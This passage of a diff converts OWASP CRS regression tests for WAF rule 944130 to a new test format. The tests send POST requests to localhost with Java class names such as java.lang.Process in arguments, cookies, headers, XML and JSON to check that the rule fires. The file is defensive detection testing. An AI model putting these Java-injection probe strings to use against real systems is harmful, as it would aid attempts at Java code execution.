"application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Integer\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 287 desc: "Argument test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-288 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 288 desc: "Argument name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-289 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number=test" + output: + log: + expect_ids: [944130] + - test_id: 289 desc: "Cookie test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Number - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-290 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Number + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 290 desc: "Cookie name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Number=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-291 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Number=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 291 desc: "Request header test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Number - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-292 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Number + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 292 desc: "XML attribute value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-293 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 293 desc: "XML element value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-294 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 294 desc: "Nested XML element value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-295 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 295 desc: "Content-Type text/plain includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-296 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 296 desc: "Content-Type application/json arg value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Number\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-297 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Number\"}" + output: + log: + expect_ids: [944130] + - test_id: 297 desc: "Content-Type application/json arg name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Number\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-298 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Number\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 298 desc: "Argument test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-299 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 299 desc: "Argument name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-300 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object=test" + output: + log: + expect_ids: [944130] + - test_id: 300 desc: "Cookie test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Object - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-301 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Object + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 301 desc: "Cookie name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Object=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-302 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Object=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 302 desc: "Request header test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Object - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-303 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Object + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 303 desc: "XML attribute value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 304 desc: "XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 305 desc: "Nested XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 306 desc: "Content-Type text/plain includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 307 desc: "Content-Type application/json arg value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Object\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log: + expect_ids: [944130] + - test_id: 308 desc: "Content-Type application/json arg name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Object\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 309 desc: "Argument test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 310 desc: "Argument name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log: + expect_ids: [944130] + - test_id: 311 desc: "Cookie test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 312 desc: "Cookie name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Process=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 313 desc: "Request header test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-314 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 314 desc: "XML attribute value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 315 desc: "XML element value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 